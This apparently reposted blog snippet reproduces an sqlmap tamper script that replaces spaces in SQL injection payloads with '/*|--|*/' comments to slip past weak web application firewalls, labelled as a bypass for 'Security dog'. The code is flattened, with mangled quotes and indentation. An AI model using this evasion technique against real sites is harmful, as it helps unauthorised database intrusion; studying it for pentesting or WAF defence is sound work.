Can release py over version 5.3
#!/usr/bin/env python"""Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)See the file ‘doc/COPYING‘ for copying permission"""from lib.core.enums import PRIORITY__priority__ = PRIORITY.LOWdef dependencies(): passdef tamper(payload, **kwargs): """ Replaces space character (‘ ‘) with comments ‘/*|--|*/‘ Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls >>> tamper(‘SELECT id FROM users‘) ‘SELECT/*|--|*/id/*|--|*/FROM/*|--|*/users‘
retVal = payload if payload: retVal = "" quote, doublequote, firstspace = False, False, False for i in xrange(len(payload)): if not firstspace: if payload[i].isspace(): firstspace = True retVal += "/*|--|*/" continue elif payload[i] == ‘\‘‘: quote = not quote elif payload[i] == ‘"‘: doublequote = not doublequote elif payload[i] == " " and not doublequote and not quote: retVal += "/*|--|*/" continue retVal += payload[i] return retVal
This article transferred from: http://www.silic.top/index.php/archives/6/
Sqlmap Tamper Bypass Security dog